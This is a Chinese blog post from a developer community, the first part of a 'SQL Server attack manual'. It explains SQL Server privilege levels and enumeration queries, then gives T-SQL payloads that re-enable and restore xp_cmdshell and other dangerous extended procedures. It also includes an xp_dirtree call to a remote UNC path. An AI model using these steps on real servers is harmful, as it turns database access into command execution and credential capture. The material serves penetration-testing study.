开发者社区> 游客az7yd3cqma4aw> 正文

SQLserver攻击手册(一)(上)

2023-02-14 5609

简介: SQLserver攻击手册(一)
+关注继续查看

一、SQL server概述

SQL Server是Microsoft开发的关系数据库管理系统(RDBMS)。它是市场上最受欢迎的DBMS之一。SQL Server具有极其广泛的用途,它可以在各个方面使用,小到存储个人博客的内容到大到存储客户数据。

SQL Server的常见角色是:

  • Sysadmin角色:SQL Server管理员。
  • Public角色:最低特权,类似于Windows中的everyone组。


SQL SERVER手册

    https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-addextendedproc-transact-sql?view=sql-server-ver15

SQL server攻击思路及文章:

    简书:https://www.jianshu.com/p/68f7e51a6aee

    谢公子:https://www.anquanke.com/post/id/200154

二、SQL server基础操作

SQL server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为 1433。数据库后缀名 .mdf,注释符是 -- 。延时命令:WAITFOR  DELAY  '0:0:2'

SQLServer有三个权限级别:

  • sa权限:数据库操作,文件管理,命令执行,注册表读取等system。SQLServer数据库的最高权限

db权限:文件管理,数据库操作等权限 users-administrators

public权限:数据库操作 guest-users

(1)判断当前用户权限

判断是否是SA权限
select is_srvrolemember('sysadmin')     
判断是否是db_owner权限  
select is_member('db_owner')
判断是否是public权限
select is_srvrolemember('public')

(2)SQL server数据库类型判断

640.png

SQLServer数据库有6个默认的库,分别是4个系统数据库:master 、model 、msdb 、tempdb,和2个实例数据库:ReportServer、ReportServerTempDB。其中,系统数据库 model 和 tempdb 默认是没有数据表的。

  • master数据库:master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。
  • model数据库:model数据库是建立所有用户数据库时的模板。当你建立一个新数据库时,SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。在模板对象被拷贝到新的用户数据库中之后,该数据库的所有多余空间都将被空页填满。
  • msdb数据库:msdb数据库是SQL Server中的一个特例。如果你查看这个数据库的实际定义,会发现它其实是一个用户数据库。不同之处是SQL Server拿这个数据库来做什么。所有的任务调度、报警、操作员都存储在msdb数据库中。该库的另一个功能是用来存储所有备份历史。SQL Server Agent将会使用这个库。

tempdb数据库:tempdb数据库是一个非常特殊的数据库,供所有来访问你的SQL Server的用户使用。这个库用来保存所有的临时表、存储过程和其他SQL Server建立的临时用的东西。例如,排序时要用到tempdb数据库。数据被放进tempdb数据库,排完序后再把结果返回给用户。每次SQL Server重新启动,它都会清空tempdb数据库并重建。永远不要在tempdb数据库建立需要永久保存的表。

640.png
(3)SQL server查询语句

select @@version;       #查询数据库的版本
select @@servername;    #查询服务名
select host_name();     #查询主机名,如果是用navicat远程连接的话,主机名是本地的名字
select db_name();       #查询当前数据库名
select db_name(1);      #查询第一个数据库名
select db_name(2);      #查询第二个数据库名
selectuser;            #查询当前数据库的拥有者,结果为 dbo。dbo是每个数据库的默认用户,具有所有者权限,全称:datebaseOwner ,即DbOwner 
use tempdb              #切换到tempdb表  
top n                   #查询前n条记录
limit2,3#查询第2条开始的3条数据,也就是2,3,4
selectsubstring('string',2,1)     #截取给定字符串的索引为2的1个字符
selectascii('a')                  #查询给定字符串的ascii值
selectlen('string')               #查询给定字符串的长度
EXEC sp_spaceused @updateusage = N'TRUE';  #查询当前数据库的大小
sp_spaceused '表名'                #查询指定表名的大小
EXEC master.sys.xp_dirtree '\\192.168.106.5\xx.txt',0,1;
 
#判断是否是SA权限
select is_srvrolemember('sysadmin')     
#判断是否是db_owner权限  
select is_member('db_owner')
#判断是否是public权限
select is_srvrolemember('public')
 
#数据库的连接
server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB
mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB
 
count(name)是查询总数
name是查询名字
*是查询详细信息
 
#查询数据库
selectcount(name) from sysdatabases     #查询数据库的个数,只有当前数据库是master的时候,才能执行该命令
selectnamefrom sysdatabases           #查询数据库的名字
select * from sysdatabases               #查询所有数据库的信息
 
#查询数据表
selectcount(name) from sysobjects wheretype='U'#查询当前数据库中表的个数
selectnamefrom sysobjects wheretype='U'#查询当前数据库中所有表的名字
select * from sysobjects wheretype='U'#查询当前数据库的所有表的详细信息
 
selectcount(name) from test..sysobjects where xtype='U'#查询指定test数据库中表的个数
selectnamefrom test..sysobjects where xtype='U'#查询指定test数据库中表的名字
select * from test..sysobjects where xtype='U'#查询指定test数据库中表的详细信息
 
#查询列
selectcount(name) from test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')            #查询当前数据库的指定users表的列的个数
selectnamefrom test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')         #查询当前数据库的指定users表的所有列的名字
select * from test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')      #查询当前数据库的指定users表的列的详细信息
 
selectcount(name) from test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')     #查询指定test数据库的指定users表的列的个数
selectnamefrom test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')       #查询指定test数据库的指定users表的所有列的名字
select * from test..syscolumns whereid=(selectmax(id) from test..sysobjects where xtype='u'andname='users')       #查询指定test数据库的指定users表的列的详细信息
 
#查询数据
selectcount(*) from test..users     
#查询test数据库user表的数据的条数
select * from test..users
#查询test数据库user表的所有数据

二、SQL数据库利用点

2.1在SA权限下危险的存储过程

(1)xp_cmdshell

查询xp_cmdshell存储过程是否存在

xtype为对象类型,xtype='x',表示存储过程的对象类型为扩展存储过程。

payload:

select * from master.dbo.sysobjects where xtype='x'andname='xp_cmdshell'    selectcount(*) FROM master..sysobjects Where xtype = 'X'ANDname = 'xp_cmdshell'#结果是1 xp_cmdshell打开

f51b65febdb99d000633427e5af7009d.png

dce5541546f5741b36e8103db00ed4c9.png


TSQL代码判断是否开启xp_cmdshell【T-SQL概述SQL Server用于操作数据库的编程语言为Transaction-SQL

declare @RunningOnACluster char(1)
declare @xp_cmdshell_available char(1)
declare @resultint
set @xp_cmdshell_available='Y'
set @result=0
select @RunningOnACluster=case
whenconvert(int, serverproperty('IsClustered')) = 1then'Y'
else'N'
end
if(0=(select value_in_use from sys.configurations wherename='xp_cmdshell'))
set @xp_cmdshell_available='N'if @RunningOnACluster='Y'
begin
if @xp_cmdshell_available='Y'
select @result=1
if @xp_cmdshell_available='N'
select @result=2
end
select @result
恢复xp_cmdshell存储过程
方法一

开启xp_cmdshell存储过程,解决消息15281报错,在SA权限下SQL server组织对xp_cmdshell的过程

c83828928fd33cd9bee9c29ac595e93f.png

#两条同时执行
exec sp_configure 'showadvanced options', 1; reconfigure with override ; 
exec sp_configure 'xp_cmdshell',1; reconfigure with override ;

1141c59735b3e2137153bc5456ddd88a.png


方法二

(2)解决Error Message:未能找到存储过程 ‘master..xp_cmdshell’。

第一步先删除:

dropprocedure sp_addextendedproc
dropprocedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

第二步恢复:

dbcc addextendedproc("sp_oacreate","odsole70.dll") dbcc addextendedproc("xp_cmdshell"," ")
 /* addextendedproc:将新扩展存储过程的名称注册到 Microsoft SQL Server【后续版本的 Microsoft SQL Server 将删除该功能。后续会使用CLR集成】 */

c0886a618531e8ddcc41aa00a635a54b.png

直接恢复,不管sp_addextendedproc是不是存在,需要自行上传xplog70.dll,恢复扩展存储过过程xp_cmdshell的语句:

dbcc addextendedproc("xp_cmdshell","xplog70.dll")

代码判断  系列存储过程是否存在,若不存在则恢复。

if not exists (select * from dbo.sysobjects whereid = object_id(N'[dbo]. [xp_cmdshell]'))
dbcc addextendedproc ('xp_cmdshell','xplog70.dll') 
ifnotexists (select * from dbo.sysobjects whereid = object_id(N'[dbo]. [xp_dirtree]')) 
dbcc addextendedproc ('xp_dirtree','xpstar.dll') 
ifnotexists (select * from dbo.sysobjects whereid = object_id(N'[dbo]. [xp_fixeddrives]')) 
dbcc addextendedproc ('xp_fixeddrives','xpstar.dll') ifnotexists (select * from dbo.sysobjects whereid = object_id(N'[dbo]. [xp_regwrite]')) 
dbcc addextendedproc ('xp_regwrite','xpstar.dll') 
ifnotexists (select * from dbo.sysobjects whereid = object_id(N'[dbo]. [xp_regread]')) 
dbcc addextendedproc ('xp_regread','xpstar.dll')

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

SQL 存储 调度 数据库 数据库管理 Windows
SQL Server容量 sqlserver只读 sqlserver乱码 sqlserver打开 SQL Server占用空间
开发者社区 > 数据库 > 文章
数据库备份
作者高分内容
更多
SQLserver攻击手册(一)(上) 5597 Windows下如何使用和调试GDB 148 Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496) 133
相关文章
游客az7yd3cqma4aw
SQLserver攻击手册(一)(下)
SQLserver攻击手册(一)
19 0
IT技术分享社区
数据库:SQLServer中with as 用法笔记
with as 也叫做子查询部分(subquery factoring),可以定义一个SQL段落,该SQL段落可以被整个SQL语句所用到类似于临时表的作用。with as 可以提高你的SQL语句的可读性,也有可以用在在UNION ALL的不同部分,作为提供临时数据的部分。
153 0
技术小胖子
网络工作室暑假后第二次培训资料(SQLServer存储过程和ADO.NET访问存储过程)整理(二)
1087 0
技术小胖子
网络工作室暑假后第二次培训资料(SQLServer存储过程和ADO.NET访问存储过程)整理(一)
1333 0
技术小胖子
在SQLSERVER中,决定当前会话的SET配置(翻译)[转]
1084 0
杰克.陈
第十七章——配置SQLServer(4)——优化SQLServer实例的配置
原文: 第十七章——配置SQLServer(4)——优化SQLServer实例的配置 前言: Sp_configure 可以用于管理和优化SQLServer资源,而且绝大部分配置都可以使用SQLServer ManagementStudio的图形化界面实现。
893 0
杰克.陈
Sql Server之旅——第十一站 简单说说sqlserver的执行计划
原文:Sql Server之旅——第十一站 简单说说sqlserver的执行计划   我们知道sql在底层的执行给我们上层人员开了一个窗口,那就是执行计划,有了执行计划之后,我们就清楚了那些烂sql是怎么执行的,这样 就可以方便的找到sql的缺陷和优化点。
924 0
杰克.陈
解剖SQLSERVER 第十五篇 SQLSERVER存储过程的源文本存放在哪里?(译)
原文:解剖SQLSERVER 第十五篇 SQLSERVER存储过程的源文本存放在哪里?(译) 解剖SQLSERVER 第十五篇  SQLSERVER存储过程的源文本存放在哪里?(译) http://improve.dk/where-does-sql-server-store-the-source-for-stored-procedures/ 目前我正在扩展OrcaMDF Studio的功能 不单只支持系统表,DMVs 和用户表 而且也要支持存储过程。
1087 0
胡杨615
PHP连接 SQLSERVER 注意事项(经典中的经典)
文章是网上找的,从来没有弄过,一直是php+mysql 现在搞个php+mssql 也不懂,没有办法,从网上找了些资料,我是看了这些资料,才连上的mssql的第一次感觉真的挺费劲的,这些可能不需要全部看完就ok,我也是这一点那一点,可能是我比较笨吧!呵呵 环境:  - Apache 2.2.6  - PHP 5.2.5  - SQL Server 2005  - Wind
1744 0
何剑
怎样用一条词句操作access和sqlserver(是内网上其它一台电脑)两个数据库?
<p>2、一条SQL运行两个数据库:<br>如果公司数据库和超市数据库的用户密码都一致,那么可以:<br>insert into 超市TABLE select * from  NKRXDATA.SAFECONTROL.dbo.公司TABLE<br>WHERE 。。。。。。<br>如果公司数据库和超市数据库的用户密码不一致,那么可以:<br>insert into超市TABLE select *
1204 0
+关注
游客az7yd3cqma4aw
文章
问答
作者高分内容
更多
SQLserver攻击手册(一)(上) 5597 Windows下如何使用和调试GDB 148 Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496) 133
文章排行榜
最热
最新
1 ArcMap矢量图层的零碎、空洞区域填补与独立区域剔除:消除面部件 111512
2 身临其境!带你“走”一遍物联网真实案例实验场景 69464
3 【Kafka从成神到升仙系列 五】面试官问我 Kafka 生产者的网络架构,我直接开始从源码背起....... 68156
4 Spark+Celeborn:更快,更稳,更弹性 66604
5 带你用Python浪漫情人节(附源码) 64498
6 Meetup 报名丨 共话云原生架构升级,微服务x容器开源 Meetup 北京站来啦! 64316
7 CVPR2021 | 视觉推理解释框架VRX:用结构化视觉概念作为解释网络推理逻辑的「语言」 63289
8 结构化总结与结构化思考之《金字塔原理》总结 56070
9 实现人机协同高稳定性,阿里云5G专网IoT方案入选工信部优秀解决方案 53908
10 重构的核心-让代码保持整洁 40111
11 【Linux】-- 开发工具yum、vim、gcc、g++、gdb、make、makefile使用介绍(一) 39696
12 【Linux】Linux的常见指令详解(下) 38145
13 【C++修炼之路】类和对象(中)—— 筑基篇 37081
14 一个大四学长分享自己的web前端学习路线--vue篇(1/3) 36089
15 Hive数据倾斜的原因以及常用解决方案 32978
16 阿里云医疗数据安全与隐私计算 32901
17 高并发编程之阻塞队列 32520
18 性能优化之使用vue-worker插件(基于Web Worker)开启多线程运算提高效率 29293
19 计网之初识网络(理解网络传输的基本流程) 27807
20 架构师的核心能力-抽象能力 27495
1 脚本启动Jar应用 162
2 重构·改善既有代码的设计.04之重构手法(下)完结 75
3 公安人脸实名认证接口说明 216
4 Linux基础操作 64
5 产品动态丨阿里云计算巢月刊-2023年第03期 91
6 基于 Apache Flink 的实时计算数据流业务引擎在京东零售的实践和落地 203
7 OCR文档自学习初体验 267
8 阿里云Elasticsearch 让搜索上云像使用“水电”一样简单 19295
9 GTC 2023 | 阿里云弹性计算团队专家演讲推荐 56
10 关于Nacos的随意添加用户 139
11 人证比对API接口的场景和优势 198
12 【分享】宜搭js代码验证组件校验结果(触发组件校验) 192
13 阿里云闫卫斌:打造具备极致容灾能力的对象存储 303
14 JAVA面试——MongoDB 140
15 Mysql 查询数据量 194
16 阿里云助力元戎启行 加速自动驾驶应用落地 259
17 Apache Flink X Apache Doris 构建极速易用的实时数仓架构 279
18 网页制作方法:创建网页页面 139
19 【事务与锁】当Transactional遇上synchronized 220
20 统一观测丨使用 Prometheus 监控 SNMP,我们该关注哪些指标? 129
推荐文章
参与OCR文档自学习产品评测,赢Airpods 2 参与云效代码管理Codeup评测,赢Redmi Watch 3 参与IoT小程序框架评测,赢CHERRY机械键盘 乘风者计划邀您入驻社区,精彩权益即刻享
相关电子书
更多
阿里云数据库案例集下载
立即下载
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载